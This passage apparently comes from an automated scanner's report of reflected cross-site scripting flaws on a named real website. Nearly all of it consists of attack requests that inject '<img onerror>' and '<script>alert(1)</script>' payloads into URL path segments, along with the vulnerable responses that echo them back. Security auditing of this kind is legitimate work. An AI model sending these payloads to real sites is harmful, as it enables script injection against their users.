Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos39c71</title><img src=a onerror=alert(1)>4d24dd761b972f1a3/images/search.php</title>
...[SNIP]...

2.4604. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ed32<img%20src%3da%20onerror%3dalert(1)>d8344127d733b0db7 was submitted in the REST URL parameter 4. This input was echoed as 3ed32<img src=a onerror=alert(1)>d8344127d733b0db7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images3ed32<img%20src%3da%20onerror%3dalert(1)>d8344127d733b0db7/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images3ed32<img src=a onerror=alert(1)>d8344127d733b0db7/search.php]</td>
...[SNIP]...

2.4605. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 60d42</title><img%20src%3da%20onerror%3dalert(1)>d3f9b2de7f079a064 was submitted in the REST URL parameter 4. This input was echoed as 60d42</title><img src=a onerror=alert(1)>d3f9b2de7f079a064 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images60d42</title><img%20src%3da%20onerror%3dalert(1)>d3f9b2de7f079a064/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images60d42</title><img src=a onerror=alert(1)>d3f9b2de7f079a064/search.php</title>
...[SNIP]...

2.4606. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 4705c</title><img%20src%3da%20onerror%3dalert(1)>ecd133c066d was submitted in the REST URL parameter 4. This input was echoed as 4705c</title><img src=a onerror=alert(1)>ecd133c066d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images4705c</title><img%20src%3da%20onerror%3dalert(1)>ecd133c066d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images4705c</title><img src=a onerror=alert(1)>ecd133c066d/search.php</title>
...[SNIP]...

2.4607. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95ce3<img%20src%3da%20onerror%3dalert(1)>2649b2cd457 was submitted in the REST URL parameter 4. This input was echoed as 95ce3<img src=a onerror=alert(1)>2649b2cd457 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images95ce3<img%20src%3da%20onerror%3dalert(1)>2649b2cd457/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images95ce3<img src=a onerror=alert(1)>2649b2cd457/search.php]</td>
...[SNIP]...

2.4608. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload d82da</title><img%20src%3da%20onerror%3dalert(1)>a17d56096df was submitted in the REST URL parameter 5. This input was echoed as d82da</title><img src=a onerror=alert(1)>a17d56096df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/search.phpd82da</title><img%20src%3da%20onerror%3dalert(1)>a17d56096df?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/search.phpd82da</title><img src=a onerror=alert(1)>a17d56096df</title>
...[SNIP]...

2.4609. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c7b1b<img%20src%3da%20onerror%3dalert(1)>b454c354ff9 was submitted in the REST URL parameter 5. This input was echoed as c7b1b<img src=a onerror=alert(1)>b454c354ff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/search.phpc7b1b<img%20src%3da%20onerror%3dalert(1)>b454c354ff9?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/search.phpc7b1b<img src=a onerror=alert(1)>b454c354ff9]</td>
...[SNIP]...

2.4610. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload e1c8d</title><img%20src%3da%20onerror%3dalert(1)>a2e51613ad78a75cf was submitted in the REST URL parameter 5. This input was echoed as e1c8d</title><img src=a onerror=alert(1)>a2e51613ad78a75cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/search.phpe1c8d</title><img%20src%3da%20onerror%3dalert(1)>a2e51613ad78a75cf?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/search.phpe1c8d</title><img src=a onerror=alert(1)>a2e51613ad78a75cf</title>
...[SNIP]...

2.4611. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 53dea<img%20src%3da%20onerror%3dalert(1)>5a628fa4cdd3bbb28 was submitted in the REST URL parameter 5. This input was echoed as 53dea<img src=a onerror=alert(1)>5a628fa4cdd3bbb28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/search.php53dea<img%20src%3da%20onerror%3dalert(1)>5a628fa4cdd3bbb28?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/search.php53dea<img src=a onerror=alert(1)>5a628fa4cdd3bbb28]</td>
...[SNIP]...

2.4612. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 33d35</title><img%20src%3da%20onerror%3dalert(1)>680ace655db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33d35</title><img src=a onerror=alert(1)>680ace655db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/search.php/33d35</title><img%20src%3da%20onerror%3dalert(1)>680ace655db HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/search.php/33d35</title><img src=a onerror=alert(1)>680ace655db</title>
...[SNIP]...

2.4613. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc7a9<img%20src%3da%20onerror%3dalert(1)>b45a2d1f06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc7a9<img src=a onerror=alert(1)>b45a2d1f06f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/search.php/fc7a9<img%20src%3da%20onerror%3dalert(1)>b45a2d1f06f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/search.php/fc7a9<img src=a onerror=alert(1)>b45a2d1f06f]</td>
...[SNIP]...

2.4614. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44448<script>alert(1)</script>897007e20d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag44448<script>alert(1)</script>897007e20d7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag44448<script>alert(1)</script>897007e20d7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4615. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86958<script>alert(1)</script>897a11e8b5091a342 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag86958<script>alert(1)</script>897a11e8b5091a342/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:02:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag86958<script>alert(1)</script>897a11e8b5091a342/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4616. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 5a196</title><img%20src%3da%20onerror%3dalert(1)>b3a2258576f was submitted in the REST URL parameter 2. This input was echoed as 5a196</title><img src=a onerror=alert(1)>b3a2258576f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes5a196</title><img%20src%3da%20onerror%3dalert(1)>b3a2258576f/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes5a196</title><img src=a onerror=alert(1)>b3a2258576f/kosmos/search.php</title>
...[SNIP]...

2.4617. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74ba4<img%20src%3da%20onerror%3dalert(1)>437e5c3602 was submitted in the REST URL parameter 2. This input was echoed as 74ba4<img src=a onerror=alert(1)>437e5c3602 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes74ba4<img%20src%3da%20onerror%3dalert(1)>437e5c3602/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes74ba4<img src=a onerror=alert(1)>437e5c3602/kosmos/search.php]</td>
...[SNIP]...

2.4618. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d563<img%20src%3da%20onerror%3dalert(1)>1f53bf76b96ac691d was submitted in the REST URL parameter 2. This input was echoed as 5d563<img src=a onerror=alert(1)>1f53bf76b96ac691d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes5d563<img%20src%3da%20onerror%3dalert(1)>1f53bf76b96ac691d/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes5d563<img src=a onerror=alert(1)>1f53bf76b96ac691d/kosmos/search.php]</td>
...[SNIP]...

2.4619. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload c01e4</title><img%20src%3da%20onerror%3dalert(1)>aceb843981f561ffa was submitted in the REST URL parameter 2. This input was echoed as c01e4</title><img src=a onerror=alert(1)>aceb843981f561ffa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

